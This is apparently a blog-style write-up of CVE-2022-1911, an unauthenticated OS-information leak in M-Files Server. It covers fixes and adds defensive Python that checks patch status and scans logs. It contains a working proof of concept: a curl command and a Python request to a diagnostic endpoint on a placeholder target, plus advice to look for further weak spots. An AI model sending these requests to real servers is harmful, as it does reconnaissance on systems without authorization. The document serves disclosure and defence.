M-Files Server is widely used for document management, storing sensitive files for everything from law firms to government agencies. Imagine if someone could peek at your server’s operating system details without any login: no password, no special account, just a simple trick on the right version. That’s exactly what happened with CVE-2022-1911, an unauthenticated info leak found in M-Files Server versions before 22.6.11534.1 and 22.6.11505. Let’s dig into how this vulnerability works, why it’s dangerous, and walk through a proof-of-concept you can try for yourself.
What is CVE-2022-1911?
Summary:
A parser function in certain M-Files Server versions made a mistake: if you hit it with the right kind of request, it returned information about the underlying Windows OS—even when you weren’t logged in.
Critical Details:
- Vulnerable Versions: before 22.6.11534.1 and 22.6.11505
- CWE: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Official Advisory:
- NVD: CVE-2022-1911
- M-Files Security Advisory
How It Happens
Certain endpoints in M-Files Server provide system info for diagnostics or debugging. Due to a logic error in the request/response parser, these endpoints didn’t check whether the user was authenticated. That means anyone who could connect to the server’s web interface could obtain details like the OS version, server name, or possibly more, which is great for attackers who want to tailor their approach.
The Proof-of-Concept (PoC)
What you need:
- Access to the M-Files Server’s HTTP(S) interface (e.g., http://server:port)
- A tool like curl or Python requests
What you’ll do:
Send a crafted HTTP GET to a vulnerable API endpoint. Instead of a normal app reply, it’ll spill system info.
Example PoC with curl
curl -k "http://TARGET-MFILES-SERVER/Server/diagnostic"
If vulnerable, you'll see raw data like:
{
"OSVersion": "Microsoft Windows Server 2016 Standard",
"MachineName": "CORP-SERVER01",
"DotNetVersion": "4.8.09032",
...more info...
}
Example PoC in Python
import requests

# Same request as the curl example; verify=False mirrors curl's -k (skips TLS checks)
url = 'http://TARGET-MFILES-SERVER/Server/diagnostic'
r = requests.get(url, verify=False)
print(r.status_code)
print(r.text)
Note:
- Replace TARGET-MFILES-SERVER with the real address.
- Find other weak spots, since showing version numbers may reveal unpatched software.
This isn’t as bad as remote code execution (RCE), but it’s a big step forward for attackers doing recon. Info like production/test server names can even help with phishing.
How to Fix
- Upgrade now: move to a fixed release (22.6.11534.1 / 22.6.11505 or later).
- Block public or unauthenticated access to the web interface.
- M-Files released the official fix and guidance here.
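Two checks a defender would want after reading the above, as an added example that is not part of the original post or M-Files' own tooling: classifying an installed build against the two fixed versions named on this page, and scanning access logs for successful unauthenticated pulls of the diagnostic endpoint. The interpretation of the two thresholds (anything below the lower build is vulnerable, anything at or above the higher is patched, in between needs the advisory) and the W3C-style log layout and internal-address allowlist are assumptions.

```python
import re
from typing import List, Tuple

# Fixed builds named on the page (two 22.6 builds); the page does not say which
# product branches they belong to, so the gap between them is treated as "review".
FIXED_BUILDS = ((22, 6, 11505), (22, 6, 11534, 1))

def parse_version(s: str) -> Tuple[int, ...]:
    """Turn '22.6.11534.1' into (22, 6, 11534, 1); rejects anything non-numeric."""
    if not re.fullmatch(r"\d+(\.\d+)+", s.strip()):
        raise ValueError(f"not a dotted version: {s!r}")
    return tuple(int(p) for p in s.strip().split("."))

def patch_status(version: str) -> str:
    """'vulnerable', 'patched', or 'review' (between the two fixed builds)."""
    v = parse_version(version)
    lowest, highest = min(FIXED_BUILDS), max(FIXED_BUILDS)
    if v < lowest:
        return "vulnerable"
    if v >= highest:
        return "patched"
    return "review"  # could be either branch; confirm against the vendor advisory

# Constructed sample log (assumed W3C/IIS-style fields: date time c-ip cs-method cs-uri-stem sc-status)
SAMPLE_LOG = """\
2022-12-01 10:00:01 10.0.0.5 GET /REST/session 200
2022-12-01 10:00:07 203.0.113.9 GET /Server/diagnostic 200
2022-12-01 10:00:09 10.0.0.5 GET /Server/diagnostic 401
2022-12-01 10:00:12 198.51.100.4 GET /server/DIAGNOSTIC 200
"""

DIAG_PATH = "/server/diagnostic"  # endpoint from the page, compared case-insensitively

def suspicious_diagnostic_hits(log_text: str, internal_prefixes=("10.",)) -> List[str]:
    """Return client IPs that fetched the diagnostic endpoint with HTTP 200
    from outside the assumed internal address ranges."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue  # skip header/comment lines or malformed entries
        _, _, ip, method, path, status = parts
        if method == "GET" and path.lower() == DIAG_PATH and status == "200":
            if not ip.startswith(internal_prefixes):
                hits.append(ip)
    return hits
```

A "review" result is the cue to read the vendor advisory rather than assume safety; a non-empty hit list means the endpoint answered an outside client with 200, which on a fixed build should not happen.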
Original References
- CVE-2022-1911 NVD entry
- M-Files Security Advisory 2022-1911
The Takeaway
Don’t leave your windows (pun intended) open! Seemingly small leaks (“just” the OS version) can be dangerous footholds for attackers. Patch early, block unauthenticated access, and check your server endpoints, even the ones that seem boring. If you’re running M-Files Server and haven’t patched this, do it now!
Did you find your server leaking info? Drop a question below or contact your IT for urgent upgrading. Stay safe!
Timeline
Published on: 11/30/2022 15:15:00 UTC
Last modified on: 12/02/2022 17:57:00 UTC